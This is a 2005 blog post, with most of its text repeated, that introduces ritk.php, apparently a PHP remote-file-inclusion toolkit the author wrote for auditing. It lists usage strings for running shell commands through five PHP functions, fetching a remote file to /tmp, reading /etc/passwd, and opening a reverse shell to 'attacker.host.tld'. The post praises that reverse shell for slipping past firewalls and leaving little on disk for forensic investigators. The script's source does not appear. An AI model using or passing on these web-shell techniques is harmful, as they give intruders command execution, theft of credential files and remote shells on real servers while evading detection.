Monday, September 12, 2005
ritk.php
(r)emote (i)nclusion (t)ool(k)it is a small php script I put together in use for
some remote inclusion auditing I was assigned to do. Surely there are numerous
scripts out there for similar usage, but I found many of them were badly coded.
Or were just over-coded. I also never really got into PHP coding too much, so it
was a perfect oppurtunity to try it out. You can grab it here, and the following
reference of its functionalities:
features:
1) "ft" (function test)
desc: a command execution test, using 5 different functions.
usage: ?&ptk.php?&ft=1
optional: append "&ftc=COMMAND" after the ft variable. replace COMMAND with
a command. the default command used is "id".
2) execute a command.
desc: execute a specific command.
usage: ?&meth=METHOD&ftc=COMMAND
replace "METHOD" with the methods listed below.
3) remotely download and save a file to local disk.
desc: the title says it best.
usage: ?&saveas=/tmp/test&grab=http://site.tld/path/file
4) src show
desc: in case the php dist has safemode enabled, you can then rely
on file reading.
usage: ?&src=/etc/passwd
5) phpinfo
desc: sometimes you need to know some configuration details, and
phpinfo() suits that need.
usage: ?&pinfo=1
6) reverse shell
desc: on servers with php sockets enabled, you can utilize this feature to
possibly bypass any firewalls with strict incoming filters. this reverse
shell function is also cool because the php script is being executed
remotely, and thus no data is saved to the target's disk. thus forensic
investigations wouldn't be so useful in disclosing the reverse shell source.
but don't forget the http logs involved, duh.
usage: ?&rvs=1&rvsto=attacker.host.tld&rvsp=port-number
execution methods:
1) system()
2) exec()
3) passthru()
4) shell_exec()
5) popen()
there is much more to go.. :) ¶ 9/12/2005 10:42:00 PM
some remote inclusion auditing I was assigned to do. Surely there are numerous
scripts out there for similar usage, but I found many of them were badly coded.
Or were just over-coded. I also never really got into PHP coding too much, so it
was a perfect oppurtunity to try it out. You can grab it here, and the following
reference of its functionalities:
features:
1) "ft" (function test)
desc: a command execution test, using 5 different functions.
usage: ?&ptk.php?&ft=1
optional: append "&ftc=COMMAND" after the ft variable. replace COMMAND with
a command. the default command used is "id".
2) execute a command.
desc: execute a specific command.
usage: ?&meth=METHOD&ftc=COMMAND
replace "METHOD" with the methods listed below.
3) remotely download and save a file to local disk.
desc: the title says it best.
usage: ?&saveas=/tmp/test&grab=http://site.tld/path/file
4) src show
desc: in case the php dist has safemode enabled, you can then rely
on file reading.
usage: ?&src=/etc/passwd
5) phpinfo
desc: sometimes you need to know some configuration details, and
phpinfo() suits that need.
usage: ?&pinfo=1
6) reverse shell
desc: on servers with php sockets enabled, you can utilize this feature to
possibly bypass any firewalls with strict incoming filters. this reverse
shell function is also cool because the php script is being executed
remotely, and thus no data is saved to the target's disk. thus forensic
investigations wouldn't be so useful in disclosing the reverse shell source.
but don't forget the http logs involved, duh.
usage: ?&rvs=1&rvsto=attacker.host.tld&rvsp=port-number
execution methods:
1) system()
2) exec()
3) passthru()
4) shell_exec()
5) popen()
there is much more to go.. :) ¶ 9/12/2005 10:42:00 PM